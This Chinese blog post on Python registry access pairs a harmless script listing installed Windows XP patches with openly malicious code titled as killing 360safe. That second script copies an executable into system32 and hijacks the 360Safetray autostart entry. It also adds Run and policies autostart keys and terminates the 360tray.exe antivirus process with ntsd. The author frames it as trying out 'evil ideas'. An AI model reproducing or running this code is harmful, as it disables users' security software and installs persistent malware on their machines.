好久没有写python程序了,语法都有些遗忘了,最近决定捡起来,顺便试验一下python在网络编程和系统编程方面的应用,实现一些邪恶的想法。
使用Python访问Windows的注册表
在
Python
的标准库中,_winreg.pyd可以操作Windows的注册表,另外第三方的win32库封装了大量的Windows API,使用起来也很方便。不过这里介绍的是使用_winreg操作注册表,毕竟是Python自带的标准库,无需安装第三方库。
下面的例子是通过Python获取Windows
XP下已经安装的补丁号。Windows的补丁号都在“HKEY_LOCAL_MACHINE\SOFTWARE\\Microsoft\\
Updates”下,通过循环下面所有的目录节点,如果找到的名称符合正则表达式KB(\d{6}).*,则表示是一个补丁号。
从例子可以看出操作起来非常的简单和快速。
[color="#cc33cc"]# -*- coding: utf-8 -*-
[color="#cc33cc"]# 获取Windows的已打的补丁号
from _winreg import *
import
re
def subRegKey(key, pattern, patchlist):
[color="#cc33cc"]# 个数
count = QueryInfoKey(key)[0]
for index in range(count):
[color="#cc33cc"]# 获取标题
name = EnumKey(key, index)
result = patch.match(name)
if result:
patchlist.append(result.group(1))
sub = OpenKey(key, name)
subRegKey(sub, pattern, patchlist)
CloseKey(sub)
if __name__ == [color="green"]'__main__':
patchlist = []
updates = [color="green"]'SOFTWARE\\Microsoft\\Updates'
patch = re.compile([color="green"]'(KB\d{6}).*')
key = OpenKey(HKEY_LOCAL_MACHINE, updates)
subRegKey(key, patch, patchlist)
print [color="green"]'Count: ' + str(len(patchlist))
for p in patchlist:
print p
CloseKey(key)
http://tenyears.cn/index.php/2007/01/26/python-win-registry.html
用python修改注册表干掉360safe
import _winreg
import os
import shutil
#复制自身
shutil.copyfile('K3.exe','c:\WINDOWS\system32\K3.exe')
#把360启动改为自身
run = _winreg.OpenKey(
_winreg.HKEY_LOCAL_MACHINE,
"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0,_winreg.KEY_WRITE
)
_winreg.SetValueEx(
run,"360Safetray",0,_winreg.REG_SZ,
r"C:\WINDOWS\system32\k3.exe"
)
#添加自启动
self = _winreg.OpenKey(
_winreg.HKEY_LOCAL_MACHINE,
"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0,_winreg.KEY_WRITE
)
_winreg.SetValueEx(
run,"k3",0,_winreg.REG_SZ,
r"C:\WINDOWS\system32\k3.exe"
)
#添加所有用户启动
allrun = _winreg.OpenKey(
_winreg.HKEY_LOCAL_MACHINE,
"Microsoft\Windows\CurrentVersion\policies\Explorer\Run",0,_winreg.KEY_WRITE
)
_winreg.SetValueEx(
allrun,"k3",0,_winreg.REG_SZ,
r"C:\WINDOWS\system32\k3.exe"
)
#终止360进程
os.popen("ntsd -c q -pn 360tray.exe cmd")
http://www.hacker.com.cn/article/view_13879.html